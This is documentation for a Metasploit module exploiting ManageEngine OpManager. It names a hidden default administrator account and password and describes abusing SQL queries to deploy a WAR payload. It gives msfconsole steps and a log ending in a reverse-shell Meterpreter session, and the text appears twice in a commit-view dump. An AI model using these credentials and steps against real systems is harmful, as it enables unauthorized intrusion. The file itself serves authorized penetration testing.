documentation/modules/exploit/windows/http/manage_engine_opmanager_rce.md

## Description

This module exploits a default credential vulnerability in ManageEngine OpManager, where a
default hidden account "IntegrationUser" with administrator privileges exists. The account
has a default password of "plugin" which can not be reset through the user interface. By
log-in and abusing the default administrator's SQL query functionality, it's possible to
write a WAR payload to disk and trigger an automatic deployment of this payload.

## Vulnerable Application

[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed
around "integrated network management".

This module has been verified against the following OpManager versions:

* v11.0
* v11.4
* v11.5
* v11.6

Installers:

* [OpManager Installers](http://archives.manageengine.com/opmanager/)

## Verification Steps

1. Start msfconsole
1. `use exploit/windows/http/manage_engine_opmanager_rce`
1. `set RHOST <IP addr of target system running OpManager>`
1. `exploit`
1. You should get a working Meterpreter session

## Scenarios

### Targeting Windows Server 2012 running OpManager v11.5

```
msf > use exploit/windows/http/manage_engine_opmanager_rce 
msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12
RHOST => 10.0.2.12
msf exploit(manage_engine_opmanager_rce) > exploit

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Access login page
[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]
[*] Following redirection
[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]
[*] Executing SQL queries
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Attempting to launch payload in deployed WAR...
[*] Sending stage (49667 bytes) to 10.0.2.12
[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500
[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war
[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : WIN-SI597APFOFH
OS          : Windows Server 2008 6.2 (amd64)
Meterpreter : java/windows
```
Add markdown docs. 2017-06-20 17:45:44 -05:00			`## Description`

			`This module exploits a default credential vulnerability in ManageEngine OpManager, where a`
			`default hidden account "IntegrationUser" with administrator privileges exists. The account`
			`has a default password of "plugin" which can not be reset through the user interface. By`
			`log-in and abusing the default administrator's SQL query functionality, it's possible to`
			`write a WAR payload to disk and trigger an automatic deployment of this payload.`

			`## Vulnerable Application`

			`[OpManager](https://www.manageengine.com/network-monitoring/) is an application designed`
			`around "integrated network management".`

			`This module has been verified against the following OpManager versions:`

			`* v11.0`
			`* v11.4`
			`* v11.5`
			`* v11.6`

			`Installers:`

			`* [OpManager Installers](http://archives.manageengine.com/opmanager/)`

			`## Verification Steps`

			`1. Start msfconsole`
			1. `use exploit/windows/http/manage_engine_opmanager_rce`
			1. `set RHOST <IP addr of target system running OpManager>`
			1. `exploit`
			`1. You should get a working Meterpreter session`

			`## Scenarios`

			`### Targeting Windows Server 2012 running OpManager v11.5`

			```
			`msf > use exploit/windows/http/manage_engine_opmanager_rce`
			`msf exploit(manage_engine_opmanager_rce) > set RHOST 10.0.2.12`
			`RHOST => 10.0.2.12`
			`msf exploit(manage_engine_opmanager_rce) > exploit`

			`[*] Started reverse TCP handler on 10.0.2.4:4444`
			`[*] Access login page`
			`[*] Location is [ http://10.0.2.12/apiclient/ember/index.jsp;jsessionid=B5903DA9A1DBA5592690EC69AF7FA27D ]`
			`[*] Following redirection`
			`[*] Retrieved API key [ 2eb58a9f104f29c8520d23243502cf5b ]`
			`[*] Executing SQL queries`
			`[*] Attempting to launch payload in deployed WAR...`
			`[*] Attempting to launch payload in deployed WAR...`
			`[*] Attempting to launch payload in deployed WAR...`
			`[*] Sending stage (49667 bytes) to 10.0.2.12`
			`[*] Meterpreter session 1 opened (10.0.2.4:4444 -> 10.0.2.12:49496) at 2017-06-20 15:13:50 -0500`
			`[+] Deleted tomcat//webapps//r63xuE3q1gOAZsCQuJ.war`
			`[!] This exploit may require manual cleanup of 'tomcat//webapps//r63xuE3q1gOAZsCQuJ' on the target`

			`meterpreter > getuid`
			`Server username: Administrator`
			`meterpreter > sysinfo`
			`Computer : WIN-SI597APFOFH`
			`OS : Windows Server 2008 6.2 (amd64)`
			`Meterpreter : java/windows`
			```